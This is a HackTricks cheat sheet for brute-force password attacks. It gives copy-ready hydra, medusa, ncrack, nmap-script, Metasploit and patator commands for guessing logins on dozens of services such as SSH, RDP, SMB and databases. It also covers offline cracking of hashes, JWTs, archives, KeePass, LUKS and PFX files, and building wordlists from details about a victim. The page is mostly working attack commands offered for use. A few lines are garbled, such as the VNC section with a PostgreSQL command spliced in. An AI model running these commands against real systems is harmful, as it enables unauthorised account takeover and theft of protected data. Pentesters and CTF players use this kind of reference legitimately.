HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Brute Force - CheatSheet
Support HackTricks and get benefits!

Default Credentials

Search in google for default credentials of the technology that is being used, or try this links:

Create your own Dictionaries

Find as much information about the target as you can and generate a custom dictionary. Tools that may help:

Crunch

1
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
2
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
3
โ€‹
4
@ Lower case alpha characters
5
, Upper case alpha characters
6
% Numeric characters
7
^ Special characters including spac
8
crunch 6 8 -t ,@@^^%%
Copied!

Cewl

1
cewl example.com -m 5 -w words.txt
Copied!

โ€‹CUPPโ€‹

Generate passwords based on your knowledge of the victim (names, dates...)
1
python3 cupp.py -h
Copied!

โ€‹pydictorโ€‹

Wordlists

Services

Ordered alphabetically by service name.

AFP

1
nmap -p 548 --script afp-brute <IP>
2
msf> use auxiliary/scanner/afp/afp_login
3
msf> set BLANK_PASSWORDS true
4
msf> set USER_AS_PASS true
5
msf> set PASS_FILE <PATH_PASSWDS>
6
msf> set USER_FILE <PATH_USERS>
7
msf> run
Copied!

AJP

1
nmap --script ajp-brute -p 8009 <IP>
Copied!

Cassandra

1
nmap --script cassandra-brute -p 9160 <IP>
Copied!

CouchDB

1
msf> use auxiliary/scanner/couchdb/couchdb_login
2
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Copied!

Docker Registry

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Copied!

Elasticsearch

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
Copied!

FTP

1
hydra -l root -P passwords.txt [-t 32] <IP> ftp
2
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
Copied!

HTTP Generic Brute

โ€‹WFuzzโ€‹

HTTP Basic Auth

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2
# Use https-get mode for httpS
3
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
Copied!

HTTP - Post Form

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
2
# Use https-post-form mode for httpS
Copied!
For https you have to change from "http-post-form" to "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

1
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
Copied!

IMAP

1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
3
nmap -sV --script imap-brute -p <PORT> <IP>
Copied!

IRC

1
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
Copied!

ISCSI

1
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
Copied!

JWT

1
#hashcat
2
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
3
โ€‹
4
#https://github.com/Sjord/jwtcrack
5
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
6
โ€‹
7
#John
8
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
9
โ€‹
10
#https://github.com/ticarpi/jwt_tool
11
python3 jwt_tool.py -d wordlists.txt <JWT token>
12
โ€‹
13
#https://github.com/brendan-rius/c-jwt-cracker
14
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
15
โ€‹
16
#https://github.com/mazen160/jwt-pwn
17
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
18
โ€‹
19
#https://github.com/lmammino/jwt-cracker
20
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
Copied!

LDAP

1
nmap --script ldap-brute -p 389 <IP>
Copied!

MQTT

1
ncrack mqtt://127.0.0.1 --user test โ€“P /root/Desktop/pass.txt -v
Copied!

Mongo

1
nmap -sV --script mongodb-brute -n -p 27017 <IP>
2
use auxiliary/scanner/mongodb/mongodb_login
Copied!

MySQL

1
# hydra
2
hydra -L usernames.txt -P pass.txt <IP> mysql
3
โ€‹
4
# msfconsole
5
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
6
โ€‹
7
# medusa
8
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
Copied!

OracleSQL

1
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
2
โ€‹
3
./odat.py passwordguesser -s $SERVER -d $SID
4
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
5
โ€‹
6
#msf1
7
msf> use admin/oracle/oracle_login
8
msf> set RHOSTS <IP>
9
msf> set RPORT 1521
10
msf> set SID <SID>
11
โ€‹
12
#msf2, this option uses nmap and it fails sometimes for some reason
13
msf> use scanner/oracle/oracle_login
14
msf> set RHOSTS <IP>
15
msf> set RPORTS 1521
16
msf> set SID <SID>
17
โ€‹
18
#nmap fails sometimes for some reson executing this script
19
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
Copied!
In order to use oracle_login with patator you need to install:
1
pip3 install cx_Oracle --upgrade
Copied!
โ€‹Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
1
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Copied!

POP

1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
Copied!

PostgreSQL

1
hydra -L /root/Desktop/user.txt โ€“P /root/Desktop/pass.txt <IP> postgres
2
medusa -h <IP> โ€“U /root/Desktop/user.txt โ€“P /root/Desktop/pass.txt โ€“M postgres
3
ncrack โ€“v โ€“U /root/Desktop/user.txt โ€“P /root/Desktop/pass.txt <IP>:5432
4
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
5
use auxiliary/scanner/postgres/postgres_login
6
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
Copied!

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/โ€‹
1
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
2
cat rockyou.txt | thc-pptp-bruter โ€“u <Username> <IP>
Copied!

RDP

1
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
2
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Copied!

Redis

1
msf> use auxiliary/scanner/redis/redis_login
2
nmap --script redis-brute -p 6379 <IP>
3
hydra โ€“P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
Copied!

Rexec

1
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Copied!

Rlogin

1
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Copied!

Rsh

1
hydra -L <Username_list> rsh://<Victim_IP> -v -V
Copied!

Rsync

1
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
Copied!

RTSP

1
hydra -l root -P passwords.txt <IP> rtsp
Copied!

SNMP

1
msf> use auxiliary/scanner/snmp/snmp_login
2
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
3
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
4
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
Copied!

SMB

1
nmap --script smb-brute -p 445 <IP>
2
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
Copied!

SMTP

1
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
2
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
Copied!

SOCKS

1
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
Copied!

SQL Server

1
#Use the NetBIOS name of the machine as domain
2
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
3
hydra -L /root/Desktop/user.txt โ€“P /root/Desktop/pass.txt <IP> mssql
4
medusa -h <IP> โ€“U /root/Desktop/user.txt โ€“P /root/Desktop/pass.txt โ€“M mssql
5
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
6
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
Copied!

SSH

1
hydra -l root -P passwords.txt [-t 32] <IP> ssh
2
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
4
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
Copied!

Telnet

1
hydra -l root -P passwords.txt [-t 32] <IP> telnet
2
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
Copied!

VNC

1
hydra -L /root/Desktop/user.txt โ€“P /root/Desktop/pass.txt -s <PORT> <IP> vnc
2
medusa -h <IP> โ€“u root -P /root/Desktop/pass.txt โ€“M vnc
3
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
4
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt โ€“t 1 โ€“x retry:fgep!='Authentication failure' --max-retries 0 โ€“x quit:code=0use auxiliary/scanner/vnc/vnc_login
5
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
6
โ€‹
7
#Metasploit
8
use auxiliary/scanner/vnc/vnc_login
9
set RHOSTS <ip>
10
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
Copied!

Winrm

1
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Copied!

Local

Online cracking databases

Check this out before trying to bruteforce a Hash.

ZIP

1
#sudo apt-get install fcrackzip
2
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
Copied!
1
zip2john file.zip > zip.john
2
john zip.john
Copied!
1
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
2
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
3
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Copied!

7z

1
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
Copied!
1
#Download and install requirements for 7z2john
2
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
3
apt-get install libcompress-raw-lzma-perl
4
./7z2john.pl file.7z > 7zhash.john
Copied!

PDF

1
apt-get install pdfcrack
2
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
3
#pdf2john didnt worked well, john didnt know which hash type was
4
# To permanently decrypt the pdf
5
sudo apt-get install qpdf
6
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
Copied!

JWT

1
git clone https://github.com/Sjord/jwtcrack.git
2
cd jwtcrack
3
โ€‹
4
#Bruteforce using crackjwt.py
5
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
6
โ€‹
7
#Bruteforce using john
8
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
9
john jwt.john #It does not work with Kali-John
Copied!

NTLM cracking

1
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
3
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Copied!

Keepass

1
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
2
keepass2john file.kdbx > hash #The keepass is only using password
3
keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
4
#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
5
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Copied!

Keberoasting

1
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
2
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
3
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Copied!

Lucks image

Method 1

1
bruteforce-luks -f ./list.txt ./backup.img
2
cryptsetup luksOpen backup.img mylucksopen
3
ls /dev/mapper/ #You should find here the image mylucksopen
4
mount /dev/mapper/mylucksopen /mnt
Copied!

Method 2

1
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
2
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
3
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
4
cryptsetup luksOpen backup.img mylucksopen
5
ls /dev/mapper/ #You should find here the image mylucksopen
6
mount /dev/mapper/mylucksopen /mnt
Copied!

Mysql

1
#John hash format
2
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
3
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
Copied!

PGP/GPG Private key

1
gpg2john private_pgp.key #This will generate the hash, save it in a file
2
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Copied!

DPAPI Master Key

Open Office Pwd Protected Column

If you have xlsx file with a column protected by password you can unprotect it:
  • Upload it to google drive and the password will be automatically removed
  • To remove it manually:
1
unzip file.xlsx
2
grep -R "sheetProtection" ./*
3
# Find something like: <sheetProtection algorithmName="SHA-512"
4
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
5
# Remove that line and rezip the file
6
zip -r file.xls .
Copied!

PFX Certificates

1
# From https://github.com/Ridter/p12tool
2
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
3
# From https://github.com/crackpkcs12/crackpkcs12
4
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Copied!

Tools

Hash-identifier

1
hash-identifier
2
> <HASH>
Copied!

John mutation

Read /etc/john/john.conf and configure it
1
john --wordlist=words.txt --rules --stdout > w_mutated.txt
2
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
Copied!

Hashcat

1
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Copied!
Cracking Linux Hashes - /etc/shadow file
1
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
3
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
4
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Copied!
Cracking Windows Hashes
1
3000 | LM | Operating-Systems
2
1000 | NTLM | Operating-Systems
Copied!
Cracking Common Application Hashes
1
900 | MD4 | Raw Hash
2
0 | MD5 | Raw Hash
3
5100 | Half MD5 | Raw Hash
4
100 | SHA1 | Raw Hash
5
10800 | SHA-384 | Raw Hash
6
1400 | SHA-256 | Raw Hash
7
1700 | SHA-512 | Raw Hash
Copied!
Support HackTricks and get benefits!